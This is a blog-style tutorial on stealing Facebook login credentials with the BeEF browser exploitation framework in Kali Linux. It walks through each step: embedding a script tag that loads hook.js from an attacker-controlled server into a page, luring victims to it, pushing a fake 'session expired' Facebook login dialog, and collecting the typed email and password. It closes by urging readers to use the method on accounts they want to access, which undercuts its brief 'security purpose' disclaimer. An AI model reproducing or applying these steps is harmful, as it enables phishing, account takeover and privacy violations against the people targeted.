Are you trying to know the Username and Password for any FB Account but you don’t want to hack their Account?That is possible!! Facebook is the most popular social media network on which about the whole world might have it’s own different accounts.People could also make multiple accounts help manage their different groups.Here in this article you will know about the methods by which the hackers or even you can get access to the credentials of FB account without hacking it.Just go through the methods that are given below in this article to learn how to hack FB credentials without hacking Facebook.
Note: Article is only for security purpose, don’t use for any illegal purpose and i am not responsible for anything.

Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That’s what this tutorial is all about. If you don’t take the time to install Kali and learn a little about networking and Linux, this won’t work for you but if you are willing to take a little time to study, you can probably gain access to someone’s Facebook credentials very easily with this little trick.

Get Facebook password without hacking facebook. 

Step 1 : Install Kali (If You Haven’t Done So Already)

The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.

Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim’s browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I’ll show you here.

Step 2 : Open BeEF

Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.

When you click on it, it starts BeEF by opening a terminal.

BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.

You will then by greeted by BeEF’s “Getting Started” screen.

Step 3 : Hook the Victim’s Browser

This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to “hook” their browser. This can be done in innumerable ways.

The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text. Use your own imagination.

The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)

<script src= “http://192.168.1.110:2300/hook.js&#8221 ; type= “text/javascript” ></script>

From here, I will be assuming you have “hooked” the victim’s browser and are ready to own it.

Step 4 : Send a Dialog Box to the User

When you have hooked the victim’s browser, its IP address, along with the operating system and browser type icons, will appear in the “Hooked Browsers” panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the ‘Commands” tab.

Click on the “Commands” tab, then scroll down the “Modules Tree” until you come to “Social Engineering” and click to expand it. It will display numerous social engineering modules. Click on “Pretty Theft,” which will open a “Module Results History” and “Pretty Theft” window.

This module enables you to send a pop-up window in the user’s browser. In our case, we will be using the Facebook dialog box.

If we click on the “Dialog Type” box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the “Execute” button the the bottom.

Step 5 : The Dialog Box Appears on the Target System

When you click “Execute” in BeEF, a dialog box will appear in the victim’s browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.

Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.

Step 6 : Harvest the Credentials

Back on our system in the BeEf interface, we can see that the credentials appear in the “Command results” window. The victim has entered their email address “test@gmail.com” and their password “weekend” and they have been captured and presented to you in BeEF.

If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).

Conclusion:So these were the things that you can do to hack the Account credentials of Facebook without even attempting to hack the Facebook account. These steps although gives you the account credentials by which you can also further access the accounts also, hence this method can also be used to hack Facebook Accounts.Just go follow the method given in this article and try to get the account credentials for the account that you want to know.

Loading